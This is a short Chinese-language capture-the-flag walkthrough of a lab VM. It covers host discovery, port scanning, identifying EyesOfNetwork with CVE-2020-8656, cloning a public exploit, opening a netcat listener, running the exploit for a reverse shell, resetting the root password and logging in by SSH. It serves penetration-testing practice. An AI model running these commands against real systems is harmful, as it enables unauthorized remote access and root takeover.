一:信息收集
1:主机发现
arp-scan -I eth0 10.9.23.0/24
kali的ip:10.9.23.112
靶机ip:10.9.23.93
2:端口扫描
nmap -A -p- -T4 10.9.23.93
开放了22,66,80,443,3306端口
3:端口探测
访问66端口,因为是上面运行了SimpleHttpServer
访问80端口,发现一个登录界面,来百度搜索Eyes of network发现可以利用的exp
漏洞编号
CVE-2020-8656
找到一个可以利用的漏洞克隆到kali
GitHub - h4knet/eonrce: EyesOfNetwork 5.1 to 5.3 exploits
git clone GitHub - h4knet/eonrce: EyesOfNetwork 5.1 to 5.3 exploits
二:渗透测试
赋予执行权限
chmod +x eonrce.py
在Kali 开启监听
nc -lvvp 6666
运行脚本:
./eonrce.py https://10.9.23.93 -ip 10.9.23.112 -port 6666
修改root的密码passwd root
由之前扫描发现开了ssh服务,我们用 ssh 连接靶机
ssh 10.9.23.93
发现最后flag